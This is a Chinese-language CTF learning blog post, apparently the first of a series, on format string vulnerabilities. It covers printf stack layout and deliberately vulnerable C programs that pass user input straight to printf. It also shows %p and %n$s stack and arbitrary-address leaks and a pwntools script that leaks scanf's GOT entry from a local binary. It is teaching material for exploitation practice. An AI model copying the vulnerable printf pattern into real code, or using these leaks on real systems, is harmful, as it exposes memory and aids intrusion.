格式化字符串漏洞 format string exploit(一)

 

 

本文系原创,转载请说明出处

本文为基于CTF WIKI的PWN学习

0x00 格式化字符串原理

   先附一张经典的图,如下

 

  其栈上布局如下:

some value 
3.14
123456
addr of “red”
addr of format string : ” Color %s, Number %d, Float %4.2f”

   如果程序写成了:

 

printf("Color %s, Number %d, Float %4.2f");

 

   分别将栈上的三个变量分别解析为:

  1. 解析其地址对应的字符串
  2. 解析其内容对应的整形值
  3. 解析其内容对应的浮点值

    我们编写程序验证以下:

#include <stdio.h>
int main() {

  printf("Color %s, Number %d, Float %4.2f", “red”, 123456, 3.14);
  printf("Color %s, Number %d, Float %4.2f");
  return 0;
}

 

   输入以下命令编译(记得安装libc6-dev-i386库):

 gcc -m32 -fno-stack-protector -no-pie -o leakmemory 1.c 

   运行结果

gdb调试一下:

b printf后输入r运行

可以看到在第一个printf的运行中,stack的参数正如上文所说,先是格式化字符串,再是123456(的16进制),最后是3.14

继续调试至第二个printf(一直按n)

 

 

 stack中我们发现,首先入栈的依旧是格式化字符串,但是上面三个参数不再是之前的那几个了。按照原理,第二次输出的应该是0xffffcfb4及之后的两个内存对应的内容。下面我们来细致讨论。

 

0x01 漏洞利用

利用格式化字符串漏洞,我们还可以获取我们所想要输出的内容。一般会有如下几种操作

  • 泄露栈内存
    • 获取某个变量的值 (%s)
    • 获取某个变量对应地址的内存 (%p)
  • 泄露任意地址内存
    • 利用 GOT 表得到 libc 函数地址,进而获取 libc,进而获取其它 libc 函数地址 (addr%n$s)
    • 盲打,dump 整个程序,获取有用信息。

 一、泄露内存

(1)获取栈变量数值

这里使用ctf wiki上面的例子:

#include <stdio.h>
int main() {
  char s[100];
  int a = 1, b = 0x22222222, c = -1;
  scanf("%s", s);
  printf("%08x.%08x.%08x.%s\n", a, b, c, s);
  printf(s);
  return 0;
}

 

编译运行调试

 

 调试:

 

 直接转载(copy)了:可以看出,此时此时已经进入了 printf 函数中,栈中第一个变量为返回地址,第二个变量为格式化字符串的地址,第三个变量为 a 的值,第四个变量为 b 的值,第五个变量为 c 的值,第六个变量为我们输入的格式化字符串对应的地址。继续运行程序,按c

 

 将会把上图中0xffffcf44及其后面两个地址包含的内容输出输出:

 

 并不是每次得到的结果都一样 ,栈上的数据会因为每次分配的内存页不同而有所不同,这是因为栈是不对内存页做初始化的。这可以从我上面的几个截图结果看出来。

(2)获取栈指定变量值

可以使用%n$x获得栈上第n+1个参数,格式化字符串是第一个参数,那么如果想获得printf的第n个参数,就需要加1.

如,我想获得第三个参数值f7e946bb,那么我就输入%3$x

(3)获取对应字符串:%s

(4)获取数据:%p

 

二、获取任意地址内存

上面的泄露并不强力,比赛中经常需要泄露某一个 libc 函数的 got 表内容,从而得到其地址,进而获取 libc 版本以及其他函数的地址,这时候,能够完全控制泄露某个指定地址的内存就显得很重要了。

这里我们再看一遍源程序代码:

#include <stdio.h>
int main() {
  char s[100];
  int a = 1, b = 0x22222222, c = -1;
  scanf("%s", s);
  printf("%08x.%08x.%08x.%s\n", a, b, c, s);
  printf(s);
  return 0;
}

 

scanf接收入s的值,然后两个printf。这里我们输入%s,如下调试,打印出0xff007325, 就是%s对应的字符串值,所以,输出函数的栈分布,栈上的第一个参数就是格式化字符串的地址。

这就意味着格式化字符串内容可控,同时,还需要注意的是,第一个参数虽然放置的是格式化字符串的地址,但是,输出函数并没有在这里开始调用,你也可以从上图中看到,在0xffffcf50处,又有一个%s,这里才是调用格式化字符串的时候,输出格式化字符串表达的内容时刻。这就意味着,因为格式化字符串我们可以自己控制,那么,如果我格式化字符串里面包含了%s,它会输出%s对应地址(0xff007325)所包含的内容,如果包含scanf@got, 它会输出scanf@got对应地址包含的内容,也就是scanf的真实地址。

总结:1、格式化字符串可以按照自己的意愿输入。2、格式化字符串的地址为栈上的第一个参数,顺序之后的某个位置会调用这个格式化字符串,以格式化字符串的内容输出内容。

所以,我们只要知道,调用这个格式化字符串的位置就可以了。

根据CTF WIKI上的说明方案,我们可以使用下面的字符来确定格式化字符串在哪调用:

[tag]%p%p%p%p%p%p...

如果输出栈的内容与我们前面的 tag 重复了,那么我们就可以有很大把握说明该地址就是格式化字符串的地址,之所以说是有很大把握,这是因为不排除栈上有一些临时变量也是该数值(0x41414141)。如:

 

 AAAA  0XFFD2RC30  0XC2  0XF7E596BB  0X41414141   0X702570250

我们调试看一下:

我输入的是AAAA加上8个%p

 

 你会看到,AAAA后面依次输出8个内容,

第一个输出AAAA,这本来就是字符,作为一个标志显示出来罢了。然后往后,%p开始作用,依次是0xffffcfa0(可以看到格式化字符串为第一个参数,%p从格式字符串下一个开始),0xc2, 0xf7e946bb这些都是跟着格式化字符串后面的参数,之后,便打印出来0xffffcfa0地址对应的内容,即字符串。也就是说,其相对printf函数,为第5个参数(第五行),但是相对格式化字符串(第一行),是第四个参数。那么既然是第四个参数,我们使用%4$s看看测试一下。

然后你会发现core dump:

 

 为啥?调试。

 

 首先,%4$s对应的存放地址为0xffffcfa0, 我们查看内存发现存着的是0x73243425, 再看看0x73243425放着什么,啥都没有,那肯定崩溃。

我们输入%4$s是0x73243425, 我们输入%5$s是0x732434525,…………….

那就是说,我们确定了参数为第几个后,在tag处输入想要获得的内容的地址,那么,输出的将是输入的地址对应的内容。

然后使用CTF wiki上payload改改就可以实现获取scanf的地址:

from pwn import *
sh = process('./leakmemory')  
leakmemory = ELF('./leakmemory')  
__isoc99_scanf_got = leakmemory.got['__isoc99_scanf']  #获取got地址
print hex(__isoc99_scanf_got)
payload = p32(__isoc99_scanf_got) + '%4$s'  #想要输出的地址加上确定好的参数位置
print payload
sh.sendline(payload)
sh.recvuntil('%4$s\n')
print hex(u32(sh.recv()[4:8])) # 去掉 __isoc99_scanf@got的地址
sh.interactive()